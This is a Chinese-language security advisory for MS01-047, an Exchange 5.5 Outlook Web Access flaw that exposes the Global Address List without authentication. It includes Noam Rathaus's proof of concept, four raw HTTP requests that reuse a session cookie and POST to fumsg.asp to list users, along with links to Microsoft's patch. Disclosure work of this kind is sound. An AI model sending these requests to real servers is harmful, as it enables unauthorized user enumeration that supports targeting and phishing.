Microsoft Exchange OWA 全球地址簿泄漏漏洞(MS01-047)
发布日期:2001-09-11
更新日期:2001-09-11
受影响系统:Microsoft Outlook Web Access for Exchange Server 5.5
- Microsoft Windows NT 4.0
描述:
BUGTRAQ ID: 3301
CVE(CAN) ID:
CVE-2001-0660
OWA((Outlook Web Access))是Exchange 5.5和2000的一个功能,可以允许用户通过
web浏览器而不是邮件客户端来访问其邮件帐号。
Exchange 5.5的OWA提供的服务中有一个查询全球地址簿(GAL)的功能。按设计,这是一
个必须通过认证才能提供的功能,它由一个双层结构实现 - 一个提供用户接口的前台层
和一个执行实际查询的后台层。但是只有前台层真正进行了认证检查。能够正确地构造请
求并发送给后台函数的攻击者可以不经过认证而进行GAL查询。
攻击者可以通过直接访问一个ASP脚本(fumsg.asp)来查询全球地址簿中的用户信息。
<*来源:Noam Rathaus (
noamr@securiteam.com)
链接:Microsoft Security Bulletin MS01-047:
http://www.microsoft.com/technet/security/bulletin/MS01-047.asp
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Noam Rathaus (
noamr@securiteam.com)提供了如下测试代码:
1) Contact:
GET /exchange/root.asp?acs=anon HTTP/1.1
Host:
www.example.com
2) Access the redirected page, and resend the issued cookie.
GET /exchange/logonfrm.asp HTTP/1.1
Host:
www.example.com
Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN
3) Access the redirected page, and resend the issued cookie.
GET /exchange/root.asp?acs=anon HTTP/1.1
Host:
www.example.com
Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN
4) Issue this request to obtain a list of users with the letter 'a' in
their name (e.g. Administrator)
POST /exchange/finduser/fumsg.asp HTTP/1.1
Host:
www.example.com
Accept: */*
Content-Type: application/x-www-form-urlencoded
Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN
DN=a&FN=&LN=&TL=&AN=&CP=&DP=&OF=&CY=&ST=&CO=
建议:
厂商补丁:
微软已经为此发布了一个安全公告(MS01-047)以及相应补丁程序:
http://www.microsoft.com/technet/security/bulletin/MS01-047.asp
补丁下载:
微软Exchange 5.5:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=32483浏览次数:4664
严重程度:0(网友投票)
